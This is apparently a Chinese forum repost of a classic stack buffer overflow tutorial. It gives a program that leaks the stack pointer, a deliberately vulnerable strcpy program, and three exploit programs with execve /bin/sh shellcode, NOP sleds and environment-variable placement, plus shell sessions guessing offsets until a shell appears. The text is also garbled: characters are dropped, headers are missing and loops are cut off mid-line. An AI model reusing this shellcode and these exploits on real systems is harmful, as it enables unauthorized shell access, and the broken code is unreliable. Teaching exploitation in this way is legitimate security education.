- 论坛徽章:
- 0
|
寻找地址 \r\n当我们尝试去溢出一个程序的缓冲区的时候,这个程序要寻找这个缓冲区的地址。这个问题的答案是:对每个程序来说,堆栈都是在同一个地址上开始的。因此,只要知道了这个堆栈的地址是在哪里的,我们就可以猜出这个缓冲区的地址了。 \r\n下面这个程序会告诉我们这个程序的的堆栈指针: \r\nlt;++> buffer/getsp.c \r\nunsigned long get_sp(void){ \r\n__asm__(\"movl %esp, %eax); \r\n} \r\nvoid main(){ \r\nfprintf(stdout,\"0x%xn\",get_sp()); \r\n} \r\nlt;--> end of getsp.c试一下下面这个例子 \r\nlt;++> buffer/hole.c \r\nvoid main(int argc,char **argv[]){ \r\nchar buffer[512]; \r\nif (argc > 1) /* otherwise we crash our little program */ \r\ntrcpy(buffer,argv[1]); \r\n} \r\nlt;--> end of hole.c \r\nlt;++> buffer/exploit1.c \r\n#include \r\n#define DEFAULT_OFFSET 0 \r\n#define DEFAULT_BUFFER_SIZE 512 \r\nchar shellcode[] = \r\n\"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b\" \r\n\"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd\" \r\n\"x80xe8xdcxffxffxff/bin/sh\"; \r\nunsigned long get_sp(void) { \r\n__asm__(\"movl %esp,%eax\"); \r\n} \r\nvoid main(int argc, char *argv[]) \r\n{ \r\nchar *buff, *ptr; \r\nlong *addr_ptr, addr; \r\nint offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; \r\nint i; \r\nif (argc > 1) bsize = atoi(argv[1]); \r\nif (argc > 2) offset = atoi(argv[2]); \r\nif (!(buff = malloc(bsize))) { \r\nrintf(\"Can\'t allocate memory.n\"); \r\nexit(0); \r\n} \r\naddr = get_sp() - offset; \r\nrintf(\"Using address: 0x%xn\", addr); \r\ntr = buff; \r\naddr_ptr = (long *) ptr; \r\nfor (i = 0; i end of exploit1.c\r\n现在我们可以猜出offset (bufferaddress = stackpointer + offset). \r\n[hosts]$ exploit1 600 \r\nUsing address: 0xbffff6c3 \r\n[hosts]$ ./hole $BUF \r\n[hosts]$ exploit1 600 100 \r\nUsing address: 0xbffffce6 \r\n[hosts]$ ./hole $BUF \r\negmentation fault \r\netc. \r\netc. \r\n就象你所知道的那样,这个过程几乎是不可能发生的,这样,我们不得不去猜出更精确的溢出地址。为了增加我们的机会,我们可以在我们的缓冲溢出的shellcode前加上 NOP(空操作)指令。因为我们没有必要去猜出它精确的溢出地址来。而NOP指令用来延迟执行的。如果这个被覆写的返回地址指针在NOP串中,我们的代码就可以在下面一步执行了。 \r\n存储器的内容应该是这样的: \r\nFFFFF NNNNNNNNNNNSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF \r\nN = NOP \r\nS = shellcode \r\nA = address pointing to the shellcode \r\nF = other data \r\n我们把原先的代码改了一下 \r\nlt;++> buffer/exploit2.c \r\n#include \r\n#define DEFAULT_OFFSET 0 \r\n#define DEFAULT_BUFFER_SIZE 512 \r\n#define NOP 0x90 \r\nchar shellcode[] = \r\n\"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b\" \r\n\"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd\" \r\n\"x80xe8xdcxffxffxff/bin/sh\"; \r\nunsigned long get_sp(void) { \r\n__asm__(\"movl %esp,%eax\"); \r\n} \r\nvoid main(int argc, char *argv[]) \r\n{ \r\nchar *buff, *ptr; \r\nlong *addr_ptr, addr; \r\nint offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; \r\nint i; \r\nif (argc > 1) bsize = atoi(argv[1]); \r\nif (argc > 2) offset = atoi(argv[2]); \r\nif (!(buff = malloc(bsize))) { \r\nrintf(\"Can\'t allocate memory.n\"); \r\nexit(0); \r\n} \r\naddr = get_sp() - offset; \r\nrintf(\"Using address: 0x%xn\", addr); \r\ntr = buff; \r\naddr_ptr = (long *) ptr; \r\nfor (i = 0; i end of exploit2.c \r\n[hosts]$ exploit2 600 \r\nUsing address: 0xbffff6c3 \r\n[hosts]$ ./hole $BUF \r\negmentation fault \r\n[hosts]$ exploit2 600 100 \r\nUsing address: 0xbffffce6 \r\n[hosts]$ ./hole $BUF \r\n#exit \r\n[hosts]$为了更完善我们的代码,我们把这些shellcode放到环境变量里去。然后我们就可以用这个变量的地址来溢出缓冲器了。这方法可以增加我们的机会。用setenv()函数来调用,并把shellcode送到环境变量中去。 \r\nlt;++> buffer/exploit3.c \r\n#include \r\n#define DEFAULT_OFFSET 0 \r\n#define DEFAULT_BUFFER_SIZE 512 \r\n#define DEFAULT_EGG_SIZE 2048 \r\n#define NOP 0x90 \r\nchar shellcode[] = \r\n\"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b\" \r\n\"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd\" \r\n\"x80xe8xdcxffxffxff/bin/sh\"; \r\nunsigned long get_esp(void) { \r\n__asm__(\"movl %esp,%eax\"); \r\n} \r\nvoid main(int argc, char *argv[]) \r\n{ \r\nchar *buff, *ptr, *egg; \r\nlong *addr_ptr, addr; \r\nint offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; \r\nint i, eggsize=DEFAULT_EGG_SIZE; \r\nif (argc > 1) bsize = atoi(argv[1]); \r\nif (argc > 2) offset = atoi(argv[2]); \r\nif (argc > 3) eggsize = atoi(argv[3]); \r\nif (!(buff = malloc(bsize))) { \r\nrintf(\"Can\'t allocate memory.n\"); \r\nexit(0); \r\n} \r\nif (!(egg = malloc(eggsize))) { \r\nrintf(\"Can\'t allocate memory.n\"); \r\nexit(0); \r\n} \r\naddr = get_esp() - offset; \r\nrintf(\"Using address: 0x%xn\", addr); \r\ntr = buff; \r\naddr_ptr = (long *) ptr; \r\nfor (i = 0; i |
|